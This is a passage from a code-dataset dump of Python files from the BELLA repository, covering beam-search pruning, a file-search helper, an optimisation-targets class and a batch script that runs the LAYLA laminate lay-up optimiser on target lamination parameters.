elem in enumerate(ss_top_tab) \\\r\n if ind not in to_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n ply_counts_tab = np.delete(\r\n ply_counts_tab, np.s_[to_del], axis=0)\r\n obj_const_tab = np.delete(obj_const_tab, np.s_[to_del])\r\n\r\n if obj_const_tab.size == 0:\r\n raise Exception(\r\n 'Infeasible beam-search, increase the branching limits')\r\n\r\n # global pruning\r\n if last_group and local_level == group_size - 2:\r\n if obj_const_tab.size > parameters.global_node_limit_p:\r\n obj_const_to_del = np.copy(obj_const_tab)\r\n for counter in range(parameters.global_node_limit_p):\r\n my_min = np.argmin(obj_const_to_del)\r\n obj_const_to_del[my_min] = 6666\r\n to_keep = obj_const_to_del == 6666\r\n to_del = np.invert(to_keep).astype(int)\r\n to_del = [i for i, x in 
enumerate(to_del) if x]\r\n ss_bot_tab = [elem for ind, elem in enumerate(ss_bot_tab) \\\r\n if ind not in to_del]\r\n if not constraints.sym:\r\n ss_top_tab = [elem for ind, elem in enumerate(ss_top_tab) \\\r\n if ind not in to_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n ply_counts_tab = np.delete(\r\n ply_counts_tab, np.s_[to_del], axis=0)\r\n obj_const_tab = np.delete(obj_const_tab, np.s_[to_del])\r\n\r\n elif local_level != group_size - 1:\r\n if obj_const_tab.size > parameters.global_node_limit:\r\n obj_const_to_del = np.copy(obj_const_tab)\r\n for counter in range(parameters.global_node_limit):\r\n my_min = np.argmin(obj_const_to_del)\r\n obj_const_to_del[my_min] = 6666\r\n to_keep = obj_const_to_del == 6666\r\n to_del = np.invert(to_keep).astype(int)\r\n to_del = [i for i, x in enumerate(to_del) if x]\r\n ss_bot_tab = [elem for ind, elem in enumerate(ss_bot_tab) \\\r\n if ind not in to_del]\r\n if not constraints.sym:\r\n ss_top_tab = [elem for ind, elem in enumerate(ss_top_tab) \\\r\n if ind not in to_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n ply_counts_tab = np.delete(\r\n ply_counts_tab, np.s_[to_del], axis=0)\r\n obj_const_tab = np.delete(obj_const_tab, np.s_[to_del])\r\n\r\n ## return results\r\n if last_group:\r\n ss_bot_tab = np.copy(ss_final)\r\n if SAVE_SUCCESS_RATE:\r\n ss_final = np.array([ss_final[ind] \\\r\n for ind in range(len(obj_const_tab)) \\\r\n if obj_const_tab[ind] < 1e10])\r\n if ss_final.size == 0:\r\n results.n_designs_repaired_unique = 0\r\n else:\r\n results.n_designs_repaired_unique = np.unique(\r\n ss_final, axis=0).shape[0]\r\n\r\n # identification of the best leaf\r\n ind_baby = np.argmin(obj_const_tab)\r\n if obj_const_tab[ind_baby] > 0.99*1e10:\r\n raise Exception(\"\"\"\r\nNo successfull repair during beam search, increase the branching limits\"\"\")\r\n results.ss_best = ss_bot_tab[ind_baby]\r\n results.lampam_best = lampam_tab[ind_baby]\r\n results.ply_counts = ply_counts_tab[ind_baby]\r\n\r\n else:\r\n # identification of the best leaf\r\n ind_baby = np.argmin(obj_const_tab)\r\n if obj_const_tab[ind_baby] > 0.99*1e10:\r\n raise Exception(\"\"\"\r\nNo successfull repair during beam search, increase the branching limits\"\"\")\r\n results.ss_bot_best = ss_bot_tab[ind_baby]\r\n if not constraints.sym:\r\n results.ss_top_best = ss_top_tab[ind_baby]\r\n results.lampam_best = lampam_tab[ind_baby]\r\n results.ply_counts = ply_counts_tab[ind_baby]\r\n\r\n# t_end = time.time()\r\n# print('time beam search', t_end - t_beg)\r\n\r\n return results\r\n\r\n\r\nclass beamsearchResults():\r\n \" An object for storing the results of a ply group search in LAYLA\"\r\n def __init__(self):\r\n \"Initialise the results of a ply group search in LAYLA\"\r\n # solution stacking sequence\r\n self.ss_bot_best = None\r\n self.ss_top_best = None\r\n self.ss_best = None\r\n # solution lamination parameters\r\n self.lampam_best = None\r\n # solution lamination parameters at each outer step\r\n self.ply_counts = None\r\n # number of nodes reached in the search tree\r\n self.n_nodes = 0\r\n# # number of objective function calls\r\n# self.n_obj_func_calls = 0\r\n # number of nodes reached at the last level of the search tree\r\n self.n_designs_last_level = 0\r\n # number of repaired nodes reached at the last level of the search tree\r\n self.n_designs_repaired = 0\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f'''\r\nResults with LAYLA:\r\n\r\n Stacking sequence: {self.ss_best}\r\n Lamination parameters 
1-4: {self.lampam_best[:4]}\r\n Lamination parameters 5-8: {self.lampam_best[4:8]}\r\n Lamination parameters 9-12: {self.lampam_best[8:]}\r\n'''\r\n"
},
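The pruning steps in the record above keep only the most promising beam-search nodes by repeatedly marking the current minimum of the objective array with the sentinel value 6666 and discarding everything left unmarked. Below is a minimal runnable sketch of that keep-the-N-best pattern; the function name and toy objective values are illustrative, and, as in the code above, the sentinel assumes the real objective values stay below it:

```python
import numpy as np

def keep_n_best(obj_const_tab, node_limit):
    """Return the indices of the `node_limit` smallest objective values."""
    obj_const_to_del = np.copy(obj_const_tab)
    for _ in range(min(node_limit, obj_const_to_del.size)):
        # Mark each successive minimum with the sentinel so it survives pruning.
        obj_const_to_del[np.argmin(obj_const_to_del)] = 6666
    return np.flatnonzero(obj_const_to_del == 6666)

objectives = np.array([3.2, 0.5, 7.1, 1.8, 2.4])
print(keep_n_best(objectives, 3))  # [1 3 4]: the three best nodes are kept
```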
{
"alpha_fraction": 0.5332326292991638,
"alphanum_fraction": 0.5347431898117065,
"avg_line_length": 34.88888931274414,
"blob_id": "15f8e74e015cc39e1cc2fe279bb3b521784e997d",
"content_id": "bc0b05fa92f880f046392c83d660b5602e58a253",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 662,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 18,
"path": "/src/divers/find_in_files.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "import os\r\nimport fnmatch\r\n\r\ndef find_in_files(directory, find, filePattern):\r\n print(find)\r\n for path, dirs, files in os.walk(os.path.abspath(directory)):\r\n for filename in fnmatch.filter(files, filePattern):\r\n filepath = os.path.join(path, filename)\r\n with open(filepath) as f:\r\n s = f.readlines()\r\n for ind_line, line in enumerate(s):\r\n if find in line:\r\n print(\" Found in \" + filepath \\\r\n + \" at line \" + str(ind_line + 1))\r\n\r\ndirectory = r'C:\\BELLA'\r\nfind = \"calc_penalty_oopo_ss(\"\r\nfind_in_files(directory, find, '*.py')"
},
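For comparison only (this is not code from the repository), the same recursive search can be sketched with pathlib in place of os.walk and fnmatch; the function name here is hypothetical:

```python
from pathlib import Path

def find_in_files_pathlib(directory, find, file_pattern='*.py'):
    """Print the location of every line containing `find` in matching files."""
    for filepath in Path(directory).rglob(file_pattern):
        lines = filepath.read_text(errors='ignore').splitlines()
        for ind_line, line in enumerate(lines):
            if find in line:
                print(f'    Found in {filepath} at line {ind_line + 1}')

find_in_files_pathlib(r'C:\BELLA', 'calc_penalty_oopo_ss(')
```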
{
"alpha_fraction": 0.5561097264289856,
"alphanum_fraction": 0.576059877872467,
"avg_line_length": 30.73469352722168,
"blob_id": "5d4ca955d71038dc80e4639a8ecc503d350ac4b3",
"content_id": "d36c8e06ef4acad5e28a241a38cb732844458553",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1604,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 49,
"path": "/src/LAYLA_V02/targets.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for optimisation targets\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\nclass Targets():\r\n \"\"\"\r\n An object for storing the targets of laminate lay-up optimisations\r\n \"\"\"\r\n def __init__(self, n_plies, lampam=np.zeros((12,), float), stack=None):\r\n \" Create targets of laminate lay-up optimisations\"\r\n self.lampam_initial = np.copy(lampam)\r\n self.lampam = np.copy(lampam)\r\n self.n_plies = n_plies\r\n self.stack = stack\r\n \r\n def filter_target_lampams(self, constraints):\r\n \"\"\"\r\n filters applied to the lamination parameters to account for orthotropy \r\n \"\"\"\r\n # If symmetry is desired, the corresponding target amination parameters \r\n # must be set to 0\r\n if constraints.sym:\r\n self.lampam[4:8] = 0\r\n # If the in-plane orthotropy is desired, the corresponding target\r\n # lamination parameters must be set to 0\r\n if constraints.ipo:\r\n self.lampam[2] = 0\r\n self.lampam[3] = 0\r\n # If the out-of-plane orthotropy is desired, the corresponding target\r\n # lamination parameters must be set to 0\r\n if constraints.oopo:\r\n self.lampam[10] = 0\r\n self.lampam[11] = 0\r\n \r\n def __repr__(self):\r\n \" Display object \"\r\n return f'''\r\nTargets:\r\n \r\n Lamination parameters 1-4: {self.lampam[:4]}\r\n Lamination parameters 5-8: {self.lampam[4:8]}\r\n Lamination parameters 9-12: {self.lampam[8:]}\r\n Number of plies: {self.n_plies}\r\n'''\r\n"
},
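To make the filtering in targets.py concrete: symmetry zeroes the coupling parameters (entries 5-8), in-plane orthotropy zeroes entries 3-4, and out-of-plane orthotropy zeroes entries 11-12 of the target vector. A minimal sketch of the same logic, using a hypothetical SimpleNamespace stand-in for the Constraints object:

```python
from types import SimpleNamespace
import numpy as np

constraints = SimpleNamespace(sym=True, ipo=True, oopo=False)  # hypothetical stub
lampam = np.linspace(-1.0, 1.0, 12)  # toy target lamination parameters

if constraints.sym:   # symmetric laminate: no membrane-bending coupling terms
    lampam[4:8] = 0
if constraints.ipo:   # in-plane orthotropy: zero lamination parameters 3 and 4
    lampam[2] = lampam[3] = 0
if constraints.oopo:  # out-of-plane orthotropy: zero lamination parameters 11 and 12
    lampam[10] = lampam[11] = 0
print(lampam)
```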
{
"alpha_fraction": 0.5333296656608582,
"alphanum_fraction": 0.5726591944694519,
"avg_line_length": 40.15081024169922,
"blob_id": "a953d276c8869d0cae81ac677a88de859f2d4b63",
"content_id": "62a6cb039d9b299326287328ed1781835dd18a96",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 36334,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 862,
"path": "/src/LAYLA_V02/scripts/run_LAYLA_V02_SSpop.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nLAYLA retrieves the LAminate LAY-ups from lamination parameters\r\n\r\nLAYLA_sspop is a script applying the optimiser LAYLA to sets of target\r\nlamination parameters.\r\n\r\nThese lamination parameters come from input files and are associated to the\r\npoulations of stacking sequences created in the folder Populations.\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.LAYLA_V02.parameters import Parameters\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.LAYLA_V02.targets import Targets\r\nfrom src.LAYLA_V02.optimiser import LAYLA_optimiser\r\nfrom src.LAYLA_V02.materials import Material\r\nfrom src.LAYLA_V02.objectives import objectives\r\nfrom src.guidelines.ipo_oopo import ipo_param_1_12\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_param\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.CLA.ABD import A_from_lampam, B_from_lampam, D_from_lampam\r\n\r\nfrom src.divers.excel import autofit_column_widths\r\nfrom src.divers.excel import delete_file\r\nfrom src.LAYLA_V02.save_set_up import save_constraints_LAYLA\r\nfrom src.LAYLA_V02.save_set_up import save_parameters_LAYLA_V02\r\nfrom src.LAYLA_V02.save_set_up import save_materials\r\n\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\n#==============================================================================\r\n# Target population\r\n#==============================================================================\r\n# Number of plies\r\nn_plies = 40\r\n#n_plies = 80\r\n#n_plies = 200\r\n#==============================================================================\r\n# Results saving\r\n#==============================================================================\r\nfilename_end = ''\r\n#==============================================================================\r\n# Type of optimisations\r\n#==============================================================================\r\noptimisation_type = 'A'\r\noptimisation_type = 'D'\r\noptimisation_type = 'AD'\r\n#==============================================================================\r\n# design and manufacturing constraints\r\n#==============================================================================\r\n### Set of design and manufacturing constraints:\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n# C0: - No design and manufacturing constraints other than symmetry\r\n# C1: - in-plane orthotropy enforced with penalties and repair\r\n# - 10% rule enforced with repair\r\n# - 10% 0deg plies\r\n# - 10% 90 deg plies\r\n# - 5% 45deg plies\r\n# - 5% -45 deg plies\r\n# - disorientation rule with Delta(theta) = 45 deg\r\n# - contiguity rule with n_contig = 5\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\n#set_of_angles = np.array([-45, 0, 45, 90, +30, -30, +60, -60], dtype=int)\r\n\r\n# symmetry\r\nsym = True\r\n\r\n# balance and in-plane orthotropy requirements\r\nif constraints_set == 'C0':\r\n bal = False\r\n ipo = False\r\nelse:\r\n bal = True\r\n ipo = True\r\n\r\n# out-of-plane orthotropy requirements\r\noopo = False\r\n\r\n# damage tolerance\r\n# rule 1: one outer ply at + or -45 deg at laminate surfaces\r\n# rule 2: [+45, -45] or [-45, +45] plies at laminate surfaces\r\n# rule 3: [+45, -45], [+45, +45], [-45, -45] or [-45, +45] plies 
at laminate\r\n# surfaces\r\ndam_tol = False\r\ndam_tol_rule = 0\r\n#if constraints_set == 'C0':\r\n# dam_tol = False\r\n# dam_tol_rule = 0\r\n#else:\r\n# dam_tol = True\r\n# dam_tol_rule = 1\r\n# dam_tol_rule = 2\r\n## dam_tol_rule = 3\r\n\r\n# 10% rule\r\nif constraints_set == 'C0':\r\n rule_10_percent = False\r\nelse:\r\n rule_10_percent = True\r\ncombine_45_135 = True\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 = 10 # percentage used in the 10% rule for +-45 deg plies\r\n\r\n# disorientation\r\nif constraints_set == 'C0':\r\n diso = False\r\nelse:\r\n diso = True\r\n\r\n# Upper bound of the variation of fibre orientation between two\r\n# contiguous plies if the disorientation constraint is active\r\ndelta_angle = 45\r\n\r\n# contiguity\r\nif constraints_set == 'C0':\r\n contig = False\r\nelse:\r\n contig = True\r\n\r\nn_contig = 5\r\n# No more that constraints.n_contig plies with same fibre orientation should be\r\n# next to each other if the contiguity constraint is active. The value taken\r\n# can only be 2, 3, 4 or 5, otherwise test functions should be modified\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n ipo=ipo,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n rule_10_percent=rule_10_percent,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles)\r\n\r\n#==============================================================================\r\n# Material properties\r\n#==============================================================================\r\n# Elastic modulus in the fibre direction (Pa)\r\nE11 = 130e9\r\n# Elastic modulus in the transverse direction (Pa)\r\nE22 = 9e9\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.3\r\n# In-plane shear modulus (Pa)\r\nG12 = 4e9\r\nmat_prop = Material(E11 = E11, E22 = E22, G12 = G12, nu12 = nu12)\r\n\r\n#==============================================================================\r\n# Optimiser Parameters\r\n#==============================================================================\r\n# number of outer loops\r\nn_outer_step = 5\r\n\r\n# branching limit for global pruning during ply orientation optimisation\r\nglobal_node_limit = 50\r\n# branching limit for local pruning during ply orientation optimisation\r\nlocal_node_limit = 100\r\n# branching limit for global pruning at the penultimate level during ply\r\n# orientation optimisation\r\nglobal_node_limit_p = 50\r\n# branching limit for local pruning at the last level during ply\r\n# orientation optimisation\r\nlocal_node_limit_final = 1\r\n\r\n### Techniques to enforce the constraints\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = True\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = True\r\n\r\n# penalty for the 10% rule based on ply count restrictions\r\npenalty_10_pc_switch = False\r\n# penalty for the 10% rule based on lamination parameter 
restrictions\r\npenalty_10_lampam_switch = False\r\n# penalty for in-plane orthotropy, based on lamination parameters\r\npenalty_ipo_switch = False\r\n# penalty for balance, based on ply counts\r\npenalty_bal_switch = False\r\n\r\nif constraints_set == 'C0':\r\n # penalty for the 10% rule based on ply count restrictions\r\n penalty_10_pc_switch = False\r\n # penalty for the 10% rule based on lamination parameter restrictions\r\n penalty_10_lampam_switch = False\r\n # penalty for in-plane orthotropy, based on lamination parameters\r\n penalty_ipo_switch = False\r\n # penalty for balance, based on ply counts\r\n penalty_bal_switch = False\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficients for the in-plane orthotropy penalty or the balance penalty\r\ncoeff_bal_ipo = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n### Other parameters\r\n\r\n# Minimum group size allowed for the smallest groups\r\ngroup_size_min = 5\r\n# Desired number of plies for the groups at each outer loop\r\ngroup_size_max = np.array([1000, 8, 8, 8, 8])\r\n\r\n# Lamination parameters to be considered in the multi-objective functions\r\nif optimisation_type == 'A':\r\n if constraints.set_of_angles is np.array([-45, 0, 45, 90], int):\r\n lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n else:\r\n lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nif optimisation_type == 'D':\r\n if constraints.set_of_angles is np.array([-45, 0, 45, 90], int):\r\n lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nif optimisation_type == 'AD':\r\n if constraints.set_of_angles is np.array([-45, 0, 45, 90], int):\r\n lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n# Lamination parameters sensitivities from the first-lebel optimiser\r\nfirst_level_sensitivities = np.ones((12,), float)\r\n\r\nparameters = Parameters(\r\n constraints=constraints,\r\n coeff_10=coeff_10,\r\n coeff_bal_ipo=coeff_bal_ipo,\r\n coeff_oopo=coeff_oopo,\r\n p_A=p_A,\r\n n_D1=n_D1,\r\n n_D2=n_D2,\r\n n_D3=n_D3,\r\n n_outer_step=n_outer_step,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n first_level_sensitivities=first_level_sensitivities,\r\n lampam_to_be_optimised=lampam_to_be_optimised,\r\n global_node_limit=global_node_limit,\r\n local_node_limit=local_node_limit,\r\n global_node_limit_p=global_node_limit_p,\r\n local_node_limit_final=local_node_limit_final,\r\n repair_membrane_switch=repair_membrane_switch,\r\n repair_flexural_switch=repair_flexural_switch,\r\n penalty_10_lampam_switch=penalty_10_lampam_switch,\r\n penalty_10_pc_switch=penalty_10_pc_switch,\r\n penalty_ipo_switch=penalty_ipo_switch,\r\n 
penalty_bal_switch=penalty_bal_switch)\r\n\r\n#==============================================================================\r\n# DO NOT CHANGE FROM THIS POINT\r\n#==============================================================================\r\nresult_filename = constraints_set + '-' + str(n_plies) + 'plies-' \\\r\n+ optimisation_type + filename_end + '.xlsx'\r\ndelete_file(result_filename)\r\n\r\n### Import the target lamination parameters\r\nif constraints_set == 'C0':\r\n data_filename = '/LAYLA_and_BELLA/populations/pop_sym_C0_' \\\r\n + str(n_plies) + 'plies.xlsx'\r\nelse:\r\n data_filename = '/LAYLA_and_BELLA/populations/pop_sym_C1_' \\\r\n + str(n_plies) + 'plies.xlsx'\r\n\r\n### Import the target lamination parameters\r\ndata = pd.read_excel(data_filename, sheet_name='stacks')\r\nif data.size == 0:\r\n raise Exception(\r\n 'Oops, no population of target lamination parameters found')\r\n\r\n### Initialisation of the result columns\r\ntable_result = pd.DataFrame()\r\n\r\n#==========================================================================\r\n# Optimiser Runs\r\n#==========================================================================\r\nfor i in range(len(data.index)):\r\n#for i in range(0, 1):\r\n\r\n print('\\n ipop', i)\r\n ### Store targets\r\n n_plies_lam = data.loc[i, 'ply_counts']\r\n # Stacking sequence considered for the 'layerwise_ss' approach\r\n ss_ini = 0*np.ones((n_plies_lam,), dtype=int)\r\n lampam_target = np.empty((12,), float)\r\n lampam_target[0] = data.loc[i, 'lampam[1]']\r\n lampam_target[1] = data.loc[i, 'lampam[2]']\r\n lampam_target[2] = data.loc[i, 'lampam[3]']\r\n lampam_target[3] = data.loc[i, 'lampam[4]']\r\n lampam_target[4] = data.loc[i, 'lampam[5]']\r\n lampam_target[5] = data.loc[i, 'lampam[6]']\r\n lampam_target[6] = data.loc[i, 'lampam[7]']\r\n lampam_target[7] = data.loc[i, 'lampam[8]']\r\n lampam_target[8] = data.loc[i, 'lampam[9]']\r\n lampam_target[9] = data.loc[i, 'lampam[10]']\r\n lampam_target[10] = data.loc[i, 'lampam[11]']\r\n lampam_target[11] = data.loc[i, 'lampam[12]']\r\n\r\n N0_Target = data.loc[i, 'N0']\r\n N90_Target = data.loc[i, 'N90']\r\n N45_Target = data.loc[i, 'N45']\r\n N135_Target = data.loc[i, 'N-45']\r\n\r\n ss_target = data.loc[i, 'ss']\r\n\r\n A11_target = data.loc[i, 'A11']\r\n A22_target = data.loc[i, 'A22']\r\n A12_target = data.loc[i, 'A12']\r\n A66_target = data.loc[i, 'A66']\r\n A16_target = data.loc[i, 'A16']\r\n A26_target = data.loc[i, 'A26']\r\n\r\n B11_target = data.loc[i, 'B11']\r\n B22_target = data.loc[i, 'B22']\r\n B12_target = data.loc[i, 'B12']\r\n B66_target = data.loc[i, 'B66']\r\n B16_target = data.loc[i, 'B16']\r\n B26_target = data.loc[i, 'B26']\r\n\r\n D11_target = data.loc[i, 'D11']\r\n D22_target = data.loc[i, 'D22']\r\n D12_target = data.loc[i, 'D12']\r\n D66_target = data.loc[i, 'D66']\r\n D16_target = data.loc[i, 'D16']\r\n D26_target = data.loc[i, 'D26']\r\n\r\n targets = Targets(\r\n n_plies=n_plies_lam, lampam=lampam_target, stack=ss_target)\r\n# print('target', ss_target)\r\n\r\n ### Algorithm run\r\n print(f'Algorithm running.')\r\n print('Laminate type: ', constraints.laminate_scheme)\r\n print('Laminate type of the target stacking sequences: ',\r\n constraints.laminate_scheme_test)\r\n\r\n t = time.time()\r\n result = LAYLA_optimiser(parameters, constraints, targets, mat_prop)\r\n elapsed1 = time.time() - t\r\n\r\n ### Results processing and display\r\n if not result.completed:\r\n\r\n # Laminate ply count\r\n table_result.loc[i, 'ply count'] = n_plies_lam\r\n\r\n # number of 
the outer loop with the best results\r\n table_result.loc[i, 'best outer loop'] = np.NaN\r\n\r\n # Computational time in s\r\n table_result.loc[i, 'time (s)'] = np.NaN\r\n\r\n# # Number of objective function evaluations\r\n# table_result.loc[i, 'Number of objective function evaluations'] = \\\r\n# np.NaN\r\n\r\n # Number of iterations\r\n table_result.loc[i, 'n_outer_step_performed'] = np.NaN\r\n\r\n # objective\r\n table_result.loc[\r\n i, 'objective with initial lamination parameter weightings'] \\\r\n = np.NaN\r\n table_result.loc[\r\n i, 'objective with modified lamination parameter weightings'] \\\r\n = np.NaN\r\n\r\n # Inhomogeneity factor\r\n table_result.loc[i, 'target inhomogeneity factor'] = \\\r\n np.linalg.norm(lampam_target[0:4] - lampam_target[8:12])\r\n\r\n # objectives\r\n for k in range(parameters.n_outer_step):\r\n table_result.loc[i, f'objective iteration {k+1}'] = np.NaN\r\n\r\n # lampam_target - lampamRetrieved\r\n table_result.loc[i, 'error1 = abs(lampam_target[1]-lampam[1])'] \\\r\n = np.NaN\r\n table_result.loc[i, 'error2'] = np.NaN\r\n table_result.loc[i, 'error3'] = np.NaN\r\n table_result.loc[i, 'error4'] = np.NaN\r\n table_result.loc[i, 'error5'] = np.NaN\r\n table_result.loc[i, 'error6'] = np.NaN\r\n table_result.loc[i, 'error7'] = np.NaN\r\n table_result.loc[i, 'error8'] = np.NaN\r\n table_result.loc[i, 'error9'] = np.NaN\r\n table_result.loc[i, 'error10'] = np.NaN\r\n table_result.loc[i, 'error11'] = np.NaN\r\n table_result.loc[i, 'error12'] = np.NaN\r\n\r\n # lampam_target\r\n table_result.loc[i, 'lampam_target[1]'] = lampam_target[0]\r\n table_result.loc[i, 'lampam_target[2]'] = lampam_target[1]\r\n table_result.loc[i, 'lampam_target[3]'] = lampam_target[2]\r\n table_result.loc[i, 'lampam_target[4]'] = lampam_target[3]\r\n table_result.loc[i, 'lampam_target[5]'] = lampam_target[4]\r\n table_result.loc[i, 'lampam_target[6]'] = lampam_target[5]\r\n table_result.loc[i, 'lampam_target[7]'] = lampam_target[6]\r\n table_result.loc[i, 'lampam_target[8]'] = lampam_target[7]\r\n table_result.loc[i, 'lampam_target[9]'] = lampam_target[8]\r\n table_result.loc[i, 'lampam_target[10]'] = lampam_target[9]\r\n table_result.loc[i, 'lampam_target[11]'] = lampam_target[10]\r\n table_result.loc[i, 'lampam_target[12]'] = lampam_target[11]\r\n\r\n # Retrieved stacking sequence at step 1\r\n table_result.loc[i, 'ss retrieved at step 1'] = np.NaN\r\n\r\n # Retrieved stacking sequence\r\n table_result.loc[i, 'ss retrieved'] = np.NaN\r\n\r\n # Target stacking sequence\r\n ss_flatten = np.array(ss_target, dtype=str)\r\n #ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[i, 'ss target'] = ss_flatten\r\n\r\n # Ply counts\r\n table_result.loc[i, 'N0_target'] = N0_Target\r\n table_result.loc[i, 'N90_target'] = N90_Target\r\n table_result.loc[i, 'N45_target'] = N45_Target\r\n table_result.loc[i, 'N-45_target'] = N135_Target\r\n table_result.loc[i, 'N0 - N0_target'] = np.NaN\r\n table_result.loc[i, 'N90 - N90_target'] = np.NaN\r\n table_result.loc[i, 'N45 - N45_target'] = np.NaN\r\n table_result.loc[i, 'N-45 - N-45_target'] = np.NaN\r\n table_result.loc[i, 'penalty value for the 10% rule'] = np.NaN\r\n\r\n for ind in range(n_outer_step):\r\n # numbers of stacks at the last level of the last group search\r\n table_result.loc[i, 'n_designs_last_level ' + str(ind + 1)] \\\r\n = np.NaN\r\n # numbers of repaired stacks at the last group search\r\n table_result.loc[i, 'n_designs_repaired ' + str(ind + 1)] \\\r\n = np.NaN\r\n # numbers of unique repaired stacks at the last group search\r\n 
table_result.loc[i, 'n_designs_repaired_unique ' + str(ind + 1)] \\\r\n = np.NaN\r\n\r\n # in-plane orthotropy\r\n table_result.loc[i, 'In-plane orthotropy parameter 1'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 2'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 3'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 4'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 5'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 6'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 7'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 8'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 9'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 10'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 11'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 12'] = np.NaN\r\n\r\n table_result.loc[i, 'diff A11 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A22 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A12 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A66 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A16 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A26 percentage'] = np.NaN\r\n\r\n table_result.loc[i, 'diff B11 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B22 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B12 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B66 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B16 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B26 percentage'] = np.NaN\r\n\r\n table_result.loc[i, 'diff D11 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D22 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D12 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D66 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D16 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D26 percentage'] = np.NaN\r\n\r\n# table_result.loc[i, 'diff A11 percentage - 